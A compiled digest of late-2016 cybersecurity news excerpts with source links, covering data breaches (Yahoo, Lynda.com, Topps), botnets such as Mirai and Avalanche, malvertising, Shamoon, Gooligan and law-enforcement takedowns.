Cyberspace surfaced as the new and limitless battleground in 2016. The past year has seen one of the most devastating cyberattacks that affected a wide variety of global sectors, including financial, geo-political and technology areas.

The past year saw the emergence of several previously unknown, elite hacker groups, whose campaigns have wreaked havoc globally and caused widescale panic among the tech community.

While some groups launched targeted DDoS attacks, focusing on harvesting data from tech giants, others operated long-term espionage campaigns that attempted at toppling political and national infrastructures.

IBTimes UK looks back at the top 5 elite hacker groups that are believed to be responsible for conducting some of the most prominent cyberattacks of the year :

- The Kremlin hackers - Fancy Bear and Cozy Bear
- Shadow Brokers
- Cyber thieves hacking banks
- Islamic State hackers
----------------------
HACKERS HIT STAR WARS COLLECTABLE TRADING CARD FIRM TOPPS
(International Business Times, dated 31st December 2016 author India Ashok)

Full article [Option 1]:

Hackers have reportedly hit iconic collectable trading cards manufacturing firm Topps. The company's popular products include Star Wars, Disney's Frozen, Top Gear and the UEFA champion league. The firm reportedly believes that hackers may have gained access to users' sensitive personal and financial information.

The data breach occurred earlier in the year and likely saw hackers making away with user information, including debit and credit card data. Topps told BBC that the security vulnerability has been fixed. The firm is also offering customers one year worth of free identity theft protection.

----------------------

ENIGMA TECHNOLOGY TO MAKE NEW ULTRA-SECURE BANK CARD
(The Telegraph via MSN, dated 24th December 2016 author Henry Bodkin)

Full article [Option 1]:

www.msn.com/en-us/news/technology/enigma-technology-to-make-new-ultra-secure-bank-card/ar-BBxvKGD?li=BBnbklF&ocid=spartandhp

Second World War cipher technology is being built into tiny processors to develop the next generation of ultra-secure bank cards .

The concept behind the design of Nazi military coding machines such as Enigma will be used to replace the existing three-digit CVV security number, which is currently found on the back of credit and debit cards.

Instead, cards will include a device that generates a frequently changing number to wrong-foot fraudsters .

The innovation is being hailed as the biggest shake-up in the field since the introduction of chip and pin in 2004.

Inventors David Taylor and George French have secured a patent for the technology, which Barclays plans to adopt.

-----------------------
MASSIVE AD FRAUD CAMPAIGN "METHBOT" PROFITS EXCEED $3 MILLION PER DAY
(TechTarget, dated 23rd December 2016 author Madelyn Bacon)

Full article [Option 1]:

http://searchsecurity.techtarget.com/news/450410008/Massive-ad-fraud-campaign-Methbot-profits-exceed-3-million-per-day

A massive cybercrime operation has been making millions of dollars a day by generating massive amounts of phony video ad impressions, according to a new report.

Researchers at cybersecurity vendor White Ops Inc. uncovered a bot farm, dubbed Methbot, that makes between $3 million and $5 million per day by conducting ad fraud by impersonating legitimate websites, running on custom browsers, and faking click rates and social media logins. Methbot -- so called because of the reference to "meth" in its code -- primarily focuses on video ads that are worth three cents per view, and "watches" about 300 million of them per day, targeting and spoofing more than 6,000 domains.

"Because White Ops is only able to analyze data directly observed by White Ops, the total ongoing monetary losses within the greater advertising ecosystem may be larger," the report states. This makes Methbot significantly larger and more profitable than other ad fraud campaigns, such as ZeroAccess, which makes approximately $900,000 per day, and Chameleon, which makes approximately $200,000 per day.

Methbot runs out of around 1,000 dedicated servers that operate from data centers in the U.S. and the Netherlands.

-----------------------
LINKEDIN SKILL-LEARNING UNIT LYNDA.COM HIT BY DATABASE BREACH
(Computer World, dated 19th December 2016 author John Ribeiro)

Full article [Option 1]:

www.computerworld.com/article/3151784/security/linkedin-skill-learning-unit-lyndacom-hit-by-database-breach.html

Lynda.com, the online learning unit of LinkedIn, has reset passwords for some of its users after it discovered recently that an unauthorized external party had accessed a database containing user data.

The passwords of close to 55,000 affected users were reset as a precautionary measure and they have been notified of the issue, LinkedIn said in a statement over the weekend.

The professional network is also notifying about 9.5 million Lynda.com users who "had learner data, but no protected password information," in the breached database. "We have no evidence that any of this data has been made publicly available and we have taken additional steps to secure Lynda.com accounts," according to the statement.

-----------------------

GCHQ URGED TO RAMP UP SECURITY TO PROTECT BRITAIN'S FINANCIAL INDUSTRY FROM ESCELATING CYBERCRIME
(Internation Business Times, dated 19th December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/gchq-urged-ramp-security-protect-britains-financial-industry-escalating-cybercrime-1597122

British intelligence agencies have been urged to ramp up cybersecurity to help protect the financial sector from escalating cybercrime. The parliament's Treasury Committee has expressed concerns over GCHQ's focus on terrorism-related and state-sponsored cyberattacks.

Conservative Party lawmaker Andrew Tyrie said that the committee was concerned about the "opaque lines of accountability", especially between intelligence agencies and regulators.

The call for greater cybersecurity protection for Britain's financial sector closely follows the cyberattack on Tesco Bank in November. The hack saw cybercriminals steal £2.5m ($3.1m) from over 9,000 customer accounts.


----------------------
GERMAN INFORMATION SECURITY AGENCY URGES SECURITY REVIEW
(The Register, dated 16th December 2016 author Darren Pauli)

Full article [Option 1]:

www.theregister.co.uk/2016/12/16/germanii_infosecii_bossii_urgesii_securityii_reviewii_afterii_yahooii_flensingii/

Germany's Bundesamt für Sicherheit in der Informationstechnik (Federal Office for Information Security or BSI) has warned users to reconsider the security chops of their email providers and plugged local services in response to news a billion credentials were stolen from Yahoo!

The oft-raided web concern revealed yesterday that hackers of unknown identity raided its servers and made off with a mind-bogglingly large horde of phone numbers, addresses, weak-MD5 hashed passwords, and security question and answers.

President of BSI Arne Schönbohm issued a statement slapping email providers, though not naming Yahoo!, for poor security form, and advised Germans to consider local providers with strong infosec credentials.

"There are a number of providers in Germany who take security seriously," Schönbohm says in the statement (in German, shoved through an online translator).

-----------------------
PENTAGON HIT BY RUSSIAN HACKERS IN CRIPPLING ATTACK THAT FORCED FULL SYSTEM OVERHAUL
(International Business Times, datd 16th December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/pentagon-hit-by-russian-hackers-crippling-attack-that-forced-full-systems-overhaul-report-1596798

Russian hackers reportedly launched a targeted cyberattack on Pentagon in August 2015, which saw the unclassified email system used by the Joint Chiefs of staff hijacked, leaving data of nearly 3,500 military personnel and civilians vulnerable to exposure. The attack's aim is believed to have been to cripple the Pentagon's systems, instead of a cyberespionage campaign, according to a report.

The then-chairman of the Joint Chiefs Martin Dempsey told CBS News that the NSA director Admiral Mike Rogers alerted him about the attack in an early morning phone call. The attack saw passwords and electronic signatures of Dempsey and hundredsof other senior Army officials obtained by the hackers.

-----------------------

HOW TO CHECK IF YOUR YAHOO ACCOUNT WAS HACKED
(Express, dated 15th December 2016 author Aaron Brown)

Full article [Option 1]:

www.express.co.uk/life-style/science-technology/743756/How-To-Check-Yahoo-Account-Hack-Change-Password

Yahoo today admitted that another devastating security breach has resulted in the theft of personal information from at least one billion Yahoo accounts.

An investigation is still ongoing into the breach, which Yahoo said occurred back in 2013.

"Yahoo has identified data security issues concerning certain Yahoo user accounts," the firm confirmed in a statement. "Yahoo has taken steps to secure user accounts and is working closely with law enforcement. As Yahoo previously disclosed in November, law enforcement provided the company with data files that a third party claimed was Yahoo user data.

"The company analysed this data with the assistance of outside forensic experts and found that it appears to be Yahoo user data.

"Based on further analysis of this data by the forensic experts, Yahoo believes an unauthorised third party, in August 2013, stole data associated with more than one billion user accounts."

Yahoo said the stolen information includes names, email addresses, telephone numbers, dates of birth, and hashed passwords.

Payment card data and bank account information was not compromised, Yahoo added.

----------------------
MALVERTISING CAMPAIGN TARGETS ROUTERS AND EVERY DEVICE CONNECTED TO ROUTER
(Computerworld, dated 14th December 2016 author Darlene Storm)

Full article [Option 1]:

http://www.computerworld.com/article/3150101/security/malvertising-campaign-targets-routers-and-every-device-connected-to-router.html

Well this is just peachy - cybercriminals are actively using a malvertising campaign that infects routers and even Android devices. If the router is pwned, then every device connected to that router is pwned.

Proofpoint researchers warned that cyber thugs are using a new and improved version of the DNSChanger exploit kit (EK) for this malvertising campaign.

Generally, malvertising involves an attacker injecting malware into ads which can infect via browsers and attack a victim's computer after simply visiting an affected page. Earlier this year, people were hit with malvertising just by visiting popular high-profile sites such as The New York Times, The Hill, MSN, BBC, NFL, AOL, Newsweek and my.xfinity.com. But this time, the malvertising exploit kit is aimed at routers.

----------------------
GLOBAL POLICE CRACKDOWN ON DDoS SERVICES NETS SUSPECTED TEENAGE CYBERCRIMINALS
(International Business Times, dated 13th December 2016 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/global-police-crackdown-ddos-services-nets-suspected-teenage-cybercriminals-1596273

An international law enforcement crackdown on users of cheap, widely-accessible cybercrime tools that can knock websites offline with ease has resulted in 34 arrests and 101 cautions around the world, with many of the suspects "young adults under the age of 20."

The operation, which had different titles in various jurisdictions, ran from 5-9 December and targeted individuals suspected of paying for distributed-denial-of-service (DDoS) services which can be purchased for as little as £4 on the Dark Web.

Europol, the police force of the European Union (EU), which co-ordinated the joint operation with agents from the FBI and the UK's National Crime Agency (NCA), said police aimed to deter youth into wading into the world of cybercrime by using arrests, warnings and fines.

-----------------------
NETGEAR ROUTER USERS WARNED
(International Business Times, dated 13th December 2016 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/netgear-users-warned-switch-off-your-home-internet-router-risk-being-hacked-1596334

If you own a router made by Netgear, a US government-backed security group is warning it may be vulnerable to hackers. The firm, which has confirmed the problems exist, is now working to rush out urgent fixes after the critical flaws were discovered to impact a slew of its products.

The US Computer Emergency Readiness Team (US-CERT) at Carnegie Mellon University says users should consider disabling their routers completely until a proper fix is rolled out. In an advisory, it explained how the easily-exploitable flaw could be used to allow complete control over the router.

After conducted tests on its product range, Netgear said the vulnerability impacts the following routers: R6250, R6400, R6700, R7000, R7100LG, R7300, R7900, and R8000. According to security blog CSO, there are nearly 10,000 devices at immediate risk.

------------------------
HACKERS HIT THYSSENKRUPP STEALING TRADE SECRETS
(International Business Times, dated 9th December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-hit-thyssenkrupp-stealing-trade-secrets-massive-cyberattack-1595677

ThyssenKrupp, one of the largest global steel manufacturers, has confirmed that it was hit by hackers and that sensitive trade secrets have been stolen as part of a "massive" cyberattack. The data breach, which was uncovered by the firm's internal security department in April, involved hackers making away with project data from ThyssenKrupp's plant engineering division and possibly other areas, according to reports.

"ThyssenKrupp has become the target of a massive cyber attack," the industrial conglomerate said in a statement, Reuters reported. The firm is yet to divulge information on how many of its departments were compromised, adding that it currently cannot estimate the scope of intellectual property losses.

-----------------------

HACKERS LAUNCH STEALTH MALVERTISING CAMPAIGN EXPOSING MILLIONS ONLINE TO SPYWARE AND MORE
(International Business Times, dated 7th December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-launch-stealth-malvertising-campaign-exposing-millions-online-spyware-more-1595238

Millions of internet users visiting popular news sites over the past few months may have been exposed to a malicious malvertising campaign. The cybercriminals behind the campaign are distributing malicious ads, which redirect users to the Stegano exploit kit.

Security researchers uncovered that the Stegano malvertising campaign, exploited several Flash vulnerabilities. The malicious ads came embedded with attack codes within individual image pixels. Stegano has been active since 2014, however, researchers noted a fresh campaign launched in October, which operates in an exceedingly stealthy manner to infect victims.

See also :

www.computerworld.com/article/3147908/security/malicious-online-ads-expose-millions-to-possible-hack.html

-----------------------
TALKTALK WIFI ROUTER PASSORDS STOLEN
(BBC News, dated 5th June 2016 author Leo Kelion)

Full article : www.bbc.co.uk/news/technology-38208958

TalkTalk customers' wi-fi passwords have been stolen following a malware attack that blocked their internet access last week, an expert has warned.

The researcher said other details had also been taken that would let attackers pinpoint where the equipment was being used, making more targeted hacks possible.

-----------------------
NEW BOTNET LAUNCHING DAILY MASSIVE DDoS ATTACKS
(Computerworld, dated 5th December 2016 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3147081/security/new-botnet-launching-daily-massive-ddos-attacks.html

A new monster botnet, which hasn't been given a name yet, has been spotted in the wild launching massive DDoS attacks.

Security experts at CloudFlare said the emerging botnet is not related to Mirai, but it is capable of enormous distributed denial-of-service attacks. If this new botnet is just starting up, it could eventually be as powerful as Mirai.

The CloudFlare has so far spent 10 days fending off DDoS attacks aimed at organisations on the US West Coast; the strongest attacks peaked at over 480 gigabits per second (Gbps) and 200 million packets per second (Mpps).

CloudFlare first detected the new botnet on November 23; peaking at 400 Gbps and 172 Mpps, the DDoS attack hammered on targets "non-stop for almost exactly 8.5 hours" before the attack ended. CloudFlare's John Graham-Cumming noted, "It felt as if an attacker 'worked' a day and then went home."

Once Thanksgiving, Black Friday and Cyber Monday were over, the attacker changed patterns and started working 24 hours a day.
-----------------------
SCOTTISH FOOTBALL ASSOCIATION APOLOGISES AFTER DATABASE "HACK" SENDS FANS £170 INVOICE SPAM
(International Business Times, dated 5th December 2016 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/scottish-football-association-apologises-after-database-hack-sends-fans-170-invoice-spam-1594980

The Scottish Football Association (SFA) has been forced to issue an apology after thousands of fans signed up its official mailing list were sent malware-ridden spam emails.

On the morning of 5 December, numerous subscribers reported receiving an email titled 'Dear Customer' that was demanding an invoice for £170 be paid within 48 hours. The phishing email included a link for payment which reportedly contained a malicious file disguised as a website link.

All emails were spoofed to look like official messages and signed as being from the 'Accounts Department' of the Scotland Supporters Club.

-----------------------
CYBERCRIME NETWORK AVALANCHE BROUGHT DOWN BY GLOBAL OPERATION
(International Business Times, dated 2nd December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/cybercrime-network-avalanche-brought-down-by-global-operation-1594519

One of the world's largest known botnet infrastructures, called "Avalanche", was successfully shut down, thanks to a joint global operation, which saw international law enforcement agencies and security experts collaborate to arrest five suspects. Avalanche is believed to have been active since 2009, sending out nearly one million malware-infected emails every week to victims across the globe, according to Europol.

A collaborative operation with EU law enforcement agencies saw five suspects arrested and over 800,000 domains, part of the botnet infrastructure, sinkholed. The massive network reportedly targeted over 40 major financial institutions and according to Europol, involved an estimated "500,000 infected computers worldwide on a daily basis".

----------------------

HACKED IN JUST SIX SECONDS
(The Telegraph, dated 2nd December 2016 author Telegraph Reporters)

Full article [Option 1]:

www.telegraph.co.uk/news/2016/12/02/hacked-just-six-seconds-criminals-need-moments-guess-card-number/

Criminals can work out the card number, expiry date and security code for a Visa debit or credit card in as little as six seconds using guesswork, researchers have found.

Experts from Newcastle University said it was "frighteningly easy" to do with a laptop and an internet connection.

Fraudsters use a so-called Distributed Guessing Attack to get around security features put in place to stop online fraud, and this may have been the method used in the recent Tesco Bank hack.

Researchers found that the system did not detect cyber criminals making multiple invalid attempts on websites in order to get payment card data.

----------------------

MAJOR CYBERCRIME NETWORK AVALANCHE DISMANTLED IN GLOBAL TAKEDOWN
(Computerworld, dated 1st December 2016 author Michael Kan)

Full article [Option 1]:

http://www.computerworld.com/article/3146705/security/major-cybercrime-network-avalanche-dismantled-in-global-takedown.html

Law enforcement agencies have dismantled a major cybercriminal network responsible for malware-based attacks that have been harassing victims across the globe for years.

The network, called Avalanche, operated as many as 500,000 infected computers on a daily basis and was responsible for delivering malware through phishing email attacks. Avalanche has been active since at least 2009, but on Thursday, authorities in the U.S. and Europe announced they had arrested five suspects allegedly involved with it.

Avalanche has been found distributing more 20 different malware families including GozNym, a banking Trojan designed to steal user credentials, and Teslacrypt, a notorious ransomware. Europol estimated the network has caused hundreds of millions of dollars in damages across the world.

To shut down Avalanche, law enforcement agencies embarked on an investigation that lasted longer than four years and involved agents and prosecutors in more than 40 countries, according to the US Department of Justice.

----------------------
DATA-WIPING MALWARE STRIKES SAUDI GOVERNMENT AGENCIES
(Computerworld, dated 1st December 2016 author Michael Kan)

Full article [Option 1]:

http://www.computerworld.com/article/3146355/security/data-wiping-malware-strikes-saudi-government-agencies.html

Saudi Arabia's government agencies were hit with a cyberattack that security researchers are blaming on a worm-like malware that can wipe computer systems, destroying data.

Several government bodies and vital installations suffered the attack, disrupting their servers, the country's Saudi Press Agency said on Thursday. The transportation sector was among the agencies hit by an actor from outside the country, the press agency said.

Security firms say the attack involved malware called Shamoon or Disttrack that was previously found targeting a Saudi Arabian oil company four years ago. That attack disabled 30,000 computers.

This latest attack involved the malware acting as a time bomb. Samples of the malicious coding were configured to begin wiping data at 8:45 p.m. local time Nov. 17, the end of the work week in the country, according to security firm Symantec.

----------------------
GOOLIGAN MALWARE SNARES ACCESS TO MORE THAT 1M GOOGLE ACCOUNTS
(Computerworld, dated 30th November 2016 author Michael Kan)

Full article [Option 1]:

www.computerworld.com/article/3145739/security/gooligan-malware-snares-access-to-more-than-1m-google-accounts.html

A new Android malware has managed to steal access to more than 1 million Google accounts, and it continues to infect new devices, according to security firm Checkpoint.

"We believe that it is the largest Google account breach to date," the security firm said in Wednesday blog post.

The malware, called Gooligan, has been preying on devices running older versions of Android, from 4.1 to 5.1, which are still used widely, especially in Asia.

Gooligan masquerades as legitimate-looking Android apps. Checkpoint has found 86 titles, many of which are offered on third-party app stores, that contain the malicious coding.

----------------------
THE NEW MIRAI STRAIN HAS SPREAD FAR BEYOND DEUTSCHE TELEKOM
(Computerworld, dated 29th November 2016 author Michael Kan)

Full article [Option 1]:

http://www.computerworld.com/article/3145403/security/the-new-mirai-strain-has-spread-far-beyond-deutsche-telekom.html

The latest strain of Mirai, the malware that's been infecting internet routers from Germany's Deutsche Telekom, has spread to devices in at least 10 other countries, according to security firm Flashpoint.

The company has detected the new Mirai strain infecting internet routers and modems across the globe, including in the U.K., Brazil, Iran and Thailand.

It's still unclear how many devices have been infected, but Flashpoint estimates that as many as five million devices are vulnerable. "If even a fraction of these vulnerable devices were compromised, they would add considerable power to an existing botnet," Flashpoint said in a Tuesday blog post.

The malware grabbed headlines on Monday when Deutsche Telekom reported that close to a million customers experienced internet connection problems from the new Mirai strain infecting their routers. Although Deutsche Telekom has offered a software update to stop the malware, security experts worry that the hackers will continue to upgrade Mirai's source code to infect additional devices.

----------------------

(1st January 2017)